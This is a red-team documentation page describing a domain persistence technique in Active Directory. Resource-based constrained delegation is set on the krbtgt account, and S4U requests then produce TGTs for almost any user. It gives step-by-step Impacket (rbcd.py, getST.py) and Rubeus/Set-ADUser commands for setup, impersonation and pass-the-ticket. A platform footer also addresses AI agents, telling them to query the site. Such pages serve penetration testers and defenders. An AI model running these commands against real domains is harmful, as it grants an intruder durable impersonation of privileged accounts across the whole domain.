> For the complete documentation index, see [llms.txt](https://red.infiltr8.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://red.infiltr8.io/ad/persistence/kerberos/delegation-to-krbtgt.md).

# Delegation to KRBTGT

## Theory

The idea behind this technique is to configure [resource-based constrained delegation](/ad/movement/kerberos/delegations/rbcd.md) on the `krbtgt` account to generate TGTs on-demand as a persistence technique. The requirements for the technique are to have enough privileges (i.e. domain admin rights) to edit the `krbtgt` account's "rbcd" attribute (i.e. `ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity`) and to control an account that has an SPN ([or create one](broken://pages/jXE6Ld8my9DXlAqJGjJn)).

Once the delegation is configured, an attacker can later on obtain a service ticket for the krbtgt on behalf of any user. Since a TGT is just a service ticket for the `KRBTGT` service, it means the attacker has a persistence technique allowing him to obtain a TGT for almost any user in the domain. The only limitations are the "Protected Users" group, or the "Account is sensitive and cannot be delegated" parameter. Those settings can protect users from delegation and will prevent attackers from obtaining a ticket that looks like a TGT on their behalf through a delegation trick.

An example of the abuse goes as follows :

1. Configure RBCD delegation on the `krbtgt` account to allow a controlled account to delegate to it. The controlled account should have at least one SPN (i.e. ServicePrincipalName) for the delegation to work ([not mandatory though](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)). This controlled account will be called "ControlledAccountWithSPN".
2. Perform a full [S4U](/ad/movement/kerberos/delegations.md) attack to obtain a Service Ticket for the `krbtgt` service, on behalf of another privileged user. Let's call this chosen user "TargetedAccount". The ticket obtained through this process is for the `KRBTGT` service, which basically means the ticket can be used as a TGT for the TargetedAccount.
3. [Pass-the-ticket](broken://pages/WzYZzG0ZhkKkcln8Wb4o) to use the TGT, act as the target -privileged- user, and authenticate to remote resources.

## Practice

{% tabs %}
{% tab title="UNIX-like" %}
Every step of this attack can be achieved using one of the following scripts from Impacket : rbcd.py and getST.py.

{% code overflow="wrap" %}

```bash
# Step 1 : Configure RBCD delegation from ControlledAccountWithSPN to krbtgt
rbcd.py -delegate-from 'ControlledAccountWithSPN' -delegate-to 'krbtgt' -dc-ip $dcIp -action write 'DOMAIN'/'PrivilegiedAccount':'StrongPassword'

# Step 2 : S4U attack for TargetedAccount to ControlledAccountWithSPN
getST.py -spn "KRBTGT" -impersonate "TargetedAccount" -dc-ip $dcIp 'DOMAIN'/'ControlledAccountWithSPN':'PasswordOfControlledAccountWithSPN'

# Step 3 : Get Service Ticket for TargetedAccount to the target service using the previously obtained ticket (which is a TGT).
KRB5CCNAME='TargetedAccount@krbtgt_DOMAIN@DOMAIN.ccache' getST.py -spn 'cifs/target' -k -no-pass 'DOMAIN'/'TargetedAccount'
```

{% endcode %}
{% endtab %}

{% tab title="Windows" %}
Every step of this attack can be achieved using Rubeus and the Set-ADUser command.

<pre class="language-powershell" data-overflow="wrap"><code class="lang-powershell"># Step 1 : Configure RBCD delegation from ControlledAccountWithSPN to krbtgt
Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount ControlledAccountWithSPN

# Step 2 : Full S4U for TargetedAccount to krbtgt using ControlledAccountWithSPN
<strong>Rubeus.exe s4u /nowrap /impersonateuser:"TargetedAccount" /msdsspn:"krbtgt" /domain:"DOMAIN" /user:"ControlledAccountWithSPN" /rc4:$NThash
</strong>
# Step 3 : Get Service Ticket for TargetedAccount to the target service using the previously obtained ticket (printed in a base64 blob thanks to the /nowrap flag), and inject it in memory using /ptt in order to use the resulting ticket for authentication to remote resources
Rubeus.exe asktgs /service:"cifs/target" /ticket:"base64ticket...." /ptt
</code></pre>

{% endtab %}
{% endtabs %}

## Resources

{% embed url="<https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#unconstrained-domain-persistence>" %}

{% embed url="<https://skyblue.team/posts/delegate-krbtgt/>" %}

{% content-ref url="/pages/htnTxu7Lh2FZC87SiVFc" %}
[(RBCD) Resource-based constrained](/ad/movement/kerberos/delegations/rbcd.md)
{% endcontent-ref %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://red.infiltr8.io/ad/persistence/kerberos/delegation-to-krbtgt.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.